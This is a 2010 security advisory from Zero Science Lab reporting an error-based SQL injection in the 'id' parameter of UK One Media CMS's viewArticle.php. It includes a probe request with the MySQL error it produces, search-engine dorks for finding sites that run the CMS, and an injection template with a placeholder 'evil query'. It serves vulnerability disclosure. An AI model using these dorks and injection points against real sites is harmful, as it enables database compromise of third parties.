1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 |
O / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ ################################################################################# | | | | | UK One Media CMS (id) Error Based SQL Injection Vulnerability | | | | | | | | Summary: Content Management System (PHP+MySQL) | | | | Vendor: UK One Media - http://www.uk1media.com | | | | Desc: UK One Media CMS suffers from an sql injection vulnerability | | when parsing query from the id param which results in compromising | | the entire database structure and executing system commands. | | | | Tested on Apache 2.x (linux), PHP/5.2.11 and MySQL/4.1.22 | | | | | --------------------------------------------------------------------------------- | | | GET .../viewArticle.php?id=xx%27 | | | | Warning: mysql_fetch_array(): supplied argument is not a valid MySQL | | result resource in /home/lqwrm/public_html/xxx/include/DbConnector.php | | on line xx. | | | --------------------------------------------------------------------------------- | | | | | | | Vulnerability discovered by Gjoko 'LiquidWorm' Krstic | | | | liquidworm gmail com | | | | http://www.zeroscience.mk | | | | | | | | Advisory ID: ZSL-2010-4942 | | | | Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4942.php | | | | | | 24.05.2010 | | | | | ################################################################################# | | | | | Dorks: | | | | "Web Design London by UK One Media - ecommerce - Web Hosting" | | "Powered by Websoftrus CMS" | | | | | | | | | | Point: | | | | http://www.example.com/viewArticle.php?id=[value]+and+1=0+[evil query] | | | | | | | | | ################################################################################# |